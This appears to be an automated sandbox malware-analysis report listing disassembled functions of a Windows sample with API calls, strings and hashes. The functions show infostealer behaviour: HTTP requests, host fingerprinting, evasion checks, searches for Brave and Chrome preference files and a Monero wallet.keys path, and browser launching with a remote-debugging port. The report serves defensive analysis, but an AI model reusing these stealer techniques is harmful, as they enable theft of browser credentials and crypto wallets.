                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CrackInternetlstrlen
                                        • String ID: <
                                        • API String ID: 1274457161-4251816714
                                        • Opcode ID: e1cab4e083f7b8b472d5fb2da74f71c0b6646eddff9cfc19bff14324ce6ae39e
                                        • Instruction ID: 0e9e0d1f4c7d82d8aaf1cdce00910050a3a66f9b4174c9861a12c82a67fd70e6
                                        • Opcode Fuzzy Hash: e1cab4e083f7b8b472d5fb2da74f71c0b6646eddff9cfc19bff14324ce6ae39e
                                        • Instruction Fuzzy Hash: B9214FB1D00209ABDF14DFA4E845ADE7B75FF44321F108625F915A72C1EB706A09CF91
                                        Function 00195440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 001862D0: InternetOpenA.WININET(001A0DFF,00000001,00000000,00000000,00000000), ref: 00186331
                                          • Part of subcall function 001862D0: StrCmpCA.SHLWAPI(?,011CE938), ref: 00186353
                                          • Part of subcall function 001862D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186385
                                          • Part of subcall function 001862D0: HttpOpenRequestA.WININET(00000000,GET,?,011CE398,00000000,00000000,00400100,00000000), ref: 001863D5
                                          • Part of subcall function 001862D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0018640F
                                          • Part of subcall function 001862D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186421
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00195478
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                        • String ID: ERROR$ERROR
                                        • API String ID: 3287882509-2579291623
                                        • Opcode ID: 26d8e563e845fd8421564f48a6e2f7dd45363c3e2e6cd73d04ec3815036915bc
                                        • Instruction ID: 82c5789417711186deadaf5f12794351546bb3aac8c53a306127af0542931cec
                                        • Opcode Fuzzy Hash: 26d8e563e845fd8421564f48a6e2f7dd45363c3e2e6cd73d04ec3815036915bc
                                        • Instruction Fuzzy Hash: C6110C30900108ABDF18FFA4DD92AED7379AF60340F904568F91A5B492EF30AB09CBD5
                                        Function 00181220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1493 181220-181247 call 198b40 GlobalMemoryStatusEx 1496 181249-181271 call 19dd30 * 2 1493->1496 1497 181273-18127a 1493->1497 1498 181281-181285 1496->1498 1497->1498 1500 18129a-18129d 1498->1500 1501 181287 1498->1501 1503 181289-181290 1501->1503 1504 181292-181294 ExitProcess 1501->1504 1503->1500 1503->1504
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0018123E
                                        • ExitProcess.KERNEL32 ref: 00181294
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitGlobalMemoryProcessStatus
                                        • String ID: @
                                        • API String ID: 803317263-2766056989
                                        • Opcode ID: 70013fe0e1e74b9349114c1f463af339f45d41cba10dc2637a1f4432f206c67d
                                        • Instruction ID: d9e3cb023833956481217387499e0743a9a42438a481ca95ca0cfba7c2e03a16
                                        • Opcode Fuzzy Hash: 70013fe0e1e74b9349114c1f463af339f45d41cba10dc2637a1f4432f206c67d
                                        • Instruction Fuzzy Hash: 3F0162B1D40308BADF10EFE4DC49BADB77DAB14705F208458F604B61C0C77456428B59
                                        Function 00197A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00197AA0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00197AA7
                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 00197ABF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateComputerNameProcess
                                        • String ID:
                                        • API String ID: 1664310425-0
                                        • Opcode ID: abee761302f2c7ec800f84324a138aa6f65488c55a1f1f4b2acc7fd8cfe87891
                                        • Instruction ID: 988f7b742a1df8e9bef355f2b4ce6520ba076365f9bf668cf25fc8b010337399
                                        • Opcode Fuzzy Hash: abee761302f2c7ec800f84324a138aa6f65488c55a1f1f4b2acc7fd8cfe87891
                                        • Instruction Fuzzy Hash: C40186B1A08349ABCB04CF98DD45BAEBBB8FB04711F100169F505E32C0D7745A00C7A1
                                        Function 00181110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0018112B
                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00181132
                                        • ExitProcess.KERNEL32 ref: 00181143
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                        • String ID:
                                        • API String ID: 1103761159-0
                                        • Opcode ID: 67005cb764f2891d1e55ec21ea91791b8996a3d39277072d5964f3da299eee2d
                                        • Instruction ID: d152669793198200b547af0da828960186950f07972a322bc17fbdaf40b1d0d3
                                        • Opcode Fuzzy Hash: 67005cb764f2891d1e55ec21ea91791b8996a3d39277072d5964f3da299eee2d
                                        • Instruction Fuzzy Hash: E7E08671989308FBE7106BA0AC0EB0C776C9B04B02F1001A4F708761D1C7B466408A5C
                                        Function 001810A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001810B3
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001810F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree
                                        • String ID:
                                        • API String ID: 2087232378-0
                                        • Opcode ID: acf469407b62ad9ad1f557708b775350ace8a7e7d2b0206cd3d0039ef64e04d8
                                        • Instruction ID: eacd90b7c8d0b77e1b46533e1aba802604059fd9fb58cc8e77719715eb068dba
                                        • Opcode Fuzzy Hash: acf469407b62ad9ad1f557708b775350ace8a7e7d2b0206cd3d0039ef64e04d8
                                        • Instruction Fuzzy Hash: 63F082B2641318BBEB14AAB4AC59FAEB79CE705B05F300458F505E7281D6719F009BA4
                                        Function 00181190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00197A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00197AA0
                                          • Part of subcall function 00197A70: RtlAllocateHeap.NTDLL(00000000), ref: 00197AA7
                                          • Part of subcall function 00197A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00197ABF
                                          • Part of subcall function 001979E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001811B7), ref: 00197A10
                                          • Part of subcall function 001979E0: RtlAllocateHeap.NTDLL(00000000), ref: 00197A17
                                          • Part of subcall function 001979E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00197A2F
                                        • ExitProcess.KERNEL32 ref: 001811C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                                        • String ID:
                                        • API String ID: 3550813701-0
                                        • Opcode ID: 41450a53093b43faa8309dd118e520921156f9ba1d6e08ab1e23b7288a37d938
                                        • Instruction ID: 716897d00f0b7f0ecbc633baa79a319e08c6c1c449807c2e2ef02681a882aa27
                                        • Opcode Fuzzy Hash: 41450a53093b43faa8309dd118e520921156f9ba1d6e08ab1e23b7288a37d938
                                        • Instruction Fuzzy Hash: 6AE0ECA6D1430162CE1077B47C0AB1A328C5B2565BF040824F905C2143EF25E9014669

                                        Non-executed Functions

                                        Function 0018BE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,001A0B32,001A0B2F,00000000,?,?,?,001A1450,001A0B2E), ref: 0018BEC5
                                        • StrCmpCA.SHLWAPI(?,001A1454), ref: 0018BF33
                                        • StrCmpCA.SHLWAPI(?,001A1458), ref: 0018BF49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0018C8A9
                                        • FindClose.KERNEL32(000000FF), ref: 0018C8BB
                                        Strings
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 0018C3B2
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 0018C495
                                        • Preferences, xrefs: 0018C104
                                        • Brave, xrefs: 0018C0E8
                                        • \Brave\Preferences, xrefs: 0018C1C1
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 0018C534
                                        • Google Chrome, xrefs: 0018C6F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                        • API String ID: 3334442632-1869280968
                                        • Opcode ID: 00f6c974e6ca7abfb521c96a93fff849d3bea57684713d8843a80faf46096893
                                        • Instruction ID: 1ad05af30fbd6326f4cdf15ec5edeeffd754bde8e1498c23a5ac4c90ea0bc9be
                                        • Opcode Fuzzy Hash: 00f6c974e6ca7abfb521c96a93fff849d3bea57684713d8843a80faf46096893
                                        • Instruction Fuzzy Hash: A352EF729101089BCF14FB60DD96EEE737DAF65301F8045A8B50A66091EF34AB4CCFA6
                                        Function 00193B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 00193B1C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00193B33
                                        • lstrcat.KERNEL32(?,?), ref: 00193B85
                                        • StrCmpCA.SHLWAPI(?,001A0F58), ref: 00193B97
                                        • StrCmpCA.SHLWAPI(?,001A0F5C), ref: 00193BAD
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00193EB7
                                        • FindClose.KERNEL32(000000FF), ref: 00193ECC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                        • API String ID: 1125553467-2524465048
                                        • Opcode ID: 38e1b2b983c677409b123c00e579398a52d68e1712dbc9937b4767c1132cc608
                                        • Instruction ID: cf7fb89ddbeefaab6e01fa8d293c4b784d24636c1a534fc409f20fb9b8f643e6
                                        • Opcode Fuzzy Hash: 38e1b2b983c677409b123c00e579398a52d68e1712dbc9937b4767c1132cc608
                                        • Instruction Fuzzy Hash: 62A13072A00208ABDF24DFA4DC85FEE7379BB59701F444598F61E96181EB70AB84CF61
                                        Function 00194B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 00194B7C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00194B93
                                        • StrCmpCA.SHLWAPI(?,001A0FC4), ref: 00194BC1
                                        • StrCmpCA.SHLWAPI(?,001A0FC8), ref: 00194BD7
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00194DCD
                                        • FindClose.KERNEL32(000000FF), ref: 00194DE2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
